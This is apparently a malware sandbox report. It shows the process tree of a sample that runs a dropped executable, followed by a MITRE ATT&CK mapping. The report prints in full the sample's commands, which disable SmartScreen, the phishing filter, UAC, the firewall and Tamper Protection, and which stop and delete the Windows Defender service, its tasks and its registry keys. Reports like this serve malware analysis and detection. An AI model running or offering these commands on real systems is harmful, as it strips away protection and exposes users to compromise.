- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer' -Name 'SmartScreenEnabled' -Value 'Off'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:3436
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
  2⤵
  PID:5548
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
    3⤵
    PID:1928
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter' -Name 'EnabledV9' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:1916
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
  2⤵
  PID:1904
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
    3⤵
    PID:4728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -PUAProtection Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3556
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c sc delete WinDefend
  2⤵
  PID:440
- - C:\Windows\system32\sc.exe
    sc delete WinDefend
    3⤵
    - Launches sc.exe
    PID:216
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
  2⤵
  PID:4684
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
    3⤵
    PID:4148
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
  2⤵
  PID:2144
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
    3⤵
    PID:2664
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings' -Name 'NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings' -Name 'NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4092
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowControlPanel /t REG_DWORD /d 0 /f
  2⤵
  PID:1348
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowControlPanel /t REG_DWORD /d 0 /f
    3⤵
    PID:4700
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyComputer /t REG_DWORD /d 0 /f
  2⤵
  PID:4876
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyComputer /t REG_DWORD /d 0 /f
    3⤵
    PID:1268
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyDocuments /t REG_DWORD /d 0 /f
  2⤵
  PID:2952
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyDocuments /t REG_DWORD /d 0 /f
    3⤵
    PID:1708
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyMusic /t REG_DWORD /d 0 /f
  2⤵
  PID:6024
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyMusic /t REG_DWORD /d 0 /f
    3⤵
    PID:4996
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyPictures /t REG_DWORD /d 0 /f
  2⤵
  PID:1992
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyPictures /t REG_DWORD /d 0 /f
    3⤵
    PID:2768
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRecentDocs /t REG_DWORD /d 0 /f
  2⤵
  PID:1908
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRecentDocs /t REG_DWORD /d 0 /f
    3⤵
    PID:4800
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRun /t REG_DWORD /d 0 /f
  2⤵
  PID:1640
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRun /t REG_DWORD /d 0 /f
    3⤵
    PID:2276
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowSearch /t REG_DWORD /d 0 /f
  2⤵
  PID:2964
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowSearch /t REG_DWORD /d 0 /f
    3⤵
    PID:3932
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowUser /t REG_DWORD /d 0 /f
  2⤵
  PID:2112
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowUser /t REG_DWORD /d 0 /f
    3⤵
    PID:3792
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c NetSh Advfirewall set allprofiles state off
  2⤵
  PID:6020
- - C:\Windows\system32\netsh.exe
    NetSh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2856
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
  2⤵
  PID:4104
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5044
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
    3⤵
    - Modifies Windows Defender TamperProtection settings
    PID:5468
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -Name 'TamperProtection' -Value 0"
  2⤵
  - Modifies Windows Defender TamperProtection settings
  - Command and Scripting Interpreter: PowerShell
  PID:2440
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
  2⤵
  PID:2744
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    PID:3136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -Name 'TamperProtection' -Value 0"
  2⤵
  - Modifies Windows Defender TamperProtection settings
  - Command and Scripting Interpreter: PowerShell
  PID:4300
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c sc config WinDefend start= disabled
  2⤵
  PID:5736
- - C:\Windows\system32\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:4696
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c sc stop WinDefend
  2⤵
  PID:4248
- - C:\Windows\system32\sc.exe
    sc stop WinDefend
    3⤵
    - Launches sc.exe
    PID:1568
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
  2⤵
  - Indicator Removal: Clear Persistence
  PID:2980
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
    3⤵
    PID:4148
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
  2⤵
  - Indicator Removal: Clear Persistence
  PID:216
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
    3⤵
    PID:4784
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
  2⤵
  - Indicator Removal: Clear Persistence
  PID:2836
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
    3⤵
    PID:4864
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
  2⤵
  - Indicator Removal: Clear Persistence
  PID:4312
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
    3⤵
    PID:5448
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c rem Disable Windows Security net stop "security center" net stop sharedaccess netsh firewall set opmode mode-disable
  2⤵
  PID:972
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /f
  2⤵
  PID:1984
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /f
    3⤵
    PID:4504
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Advanced Threat Protection" /f
  2⤵
  PID:2672
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Advanced Threat Protection" /f
    3⤵
    PID:5200
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
  2⤵
  PID:2524
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:5764
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /f
  2⤵
  PID:3456
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /f
    3⤵
    PID:852
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
  2⤵
  PID:2060
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
    3⤵
    PID:1624
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Get-WindowsFeature -Name Windows-Defender | Remove-WindowsFeature -Remove"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1932
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Get-WindowsFeature -Name Windows-Defender-GUI | Remove-WindowsFeature -Remove"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3628

C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe
C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe
1⤵
- Executes dropped EXE
PID:2332

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{E2B3C97F-6AE1-41AC-817A-F6F92166D7DD}
1⤵
- System Location Discovery: System Language Discovery
PID:376

C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe
C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe
1⤵
- Executes dropped EXE
PID:5760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

Indicator Removal

T1070

Clear Persistence

T1070.009

File Deletion

T1070.004

Modify Registry